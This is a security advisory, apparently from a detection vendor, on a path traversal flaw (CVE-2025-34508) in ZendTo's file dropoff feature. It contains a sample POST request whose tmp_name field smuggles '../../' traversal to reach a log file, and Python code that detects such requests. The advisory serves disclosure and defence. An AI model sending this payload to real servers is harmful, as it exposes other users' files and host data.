
ZendTo 'dropoff' - Path Traversal (CVE-2025-34508)



Application Details

ZendTo is an open-source, web-based tool commonly used by universities, research institutions, and enterprises to securely exchange large files with external users.


Vulnerability

A path traversal vulnerability exists in the file dropoff functionality of ZendTo versions 6.15-7 and prior.


Identification

This could allow a remote, authenticated attacker to retrieve the files of other ZendTo users, retrieve files on the host system, or cause a denial of service.


POST /dropoff

--------------------------d74496d66958873e
Content-Disposition: form-data; name="Action"

dropoff
--------------------------d74496d66958873e
Content-Disposition: form-data; name="chunkname"

.
--------------------------d74496d66958873e
Content-Disposition: form-data; name="file_1"

{"name":"zendto.log","type":"","size":"unused","tmp_name":"/../../log/zendto.log","error":0}
--------------------------d74496d66958873e


Detection

By turning this request into a traffic file with a matching rule, we are able to detect directory traversal attempts of this kind by an unauthenticated remote attacker.
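As an added illustration of the detection point above (example code, not Idappcom's signature 8026071 and not ZendTo's own code), the following Python parses a dropoff multipart body and flags any file_N part whose client-supplied JSON tmp_name resolves outside the upload directory; the upload directory path and the sample body are constructed assumptions modelled on the request shown above.

```python
import json
import posixpath
import re

UPLOAD_DIR = "/var/zendto/incoming"  # assumed placeholder, not ZendTo's real path
BOUNDARY = "-" * 24 + "d74496d66958873e"
# Constructed body modelled on the advisory's request (CRLF line endings).
SAMPLE_BODY = (
    f"--{BOUNDARY}\r\nContent-Disposition: form-data; name=\"Action\"\r\n\r\ndropoff\r\n"
    f"--{BOUNDARY}\r\nContent-Disposition: form-data; name=\"chunkname\"\r\n\r\n.\r\n"
    f"--{BOUNDARY}\r\nContent-Disposition: form-data; name=\"file_1\"\r\n\r\n"
    '{"name":"zendto.log","type":"","size":"unused",'
    '"tmp_name":"/../../log/zendto.log","error":0}\r\n'
    f"--{BOUNDARY}--\r\n"
)

def parse_multipart(body: str, boundary: str) -> dict:
    """Minimal multipart/form-data parser: {field name: raw value}."""
    fields = {}
    for part in body.split(f"--{boundary}"):
        part = part.strip("\r\n")
        if not part or part == "--":  # preamble or closing delimiter
            continue
        headers, _, value = part.partition("\r\n\r\n")
        if match := re.search(r'name="([^"]*)"', headers):
            fields[match.group(1)] = value
    return fields

def escapes_upload_dir(tmp_name: str, base: str = UPLOAD_DIR) -> bool:
    """True if base/tmp_name resolves outside base (absolute path or '..' climb)."""
    resolved = posixpath.normpath(posixpath.join(base, tmp_name.replace("\\", "/")))
    return resolved != base and not resolved.startswith(base + "/")

def inspect_dropoff(body: str, boundary: str, base: str = UPLOAD_DIR) -> list:
    """One finding per file_N part whose JSON tmp_name leaves the upload directory."""
    fields = parse_multipart(body, boundary)
    findings = []
    if fields.get("Action", "").strip() != "dropoff":
        return findings
    for name, value in fields.items():
        if not re.fullmatch(r"file_\d+", name):
            continue
        try:
            meta = json.loads(value)
        except json.JSONDecodeError:
            continue  # not the JSON file descriptor shown in the advisory
        tmp_name = str(meta.get("tmp_name", "")) if isinstance(meta, dict) else ""
        if escapes_upload_dir(tmp_name, base):
            findings.append(f"{name}: tmp_name {tmp_name!r} resolves outside {base}")
    return findings
```

Running `inspect_dropoff(SAMPLE_BODY, BOUNDARY)` on the constructed body returns one finding for file_1; a tmp_name that stays inside the upload directory returns none.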


Coverage

Idappcom have created signature 8026071 along with a traffic file for this vulnerability.


Traffic IQ

If you are concerned that your business may be at risk from this vulnerability or others, why not try out our Traffic IQ software, which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional
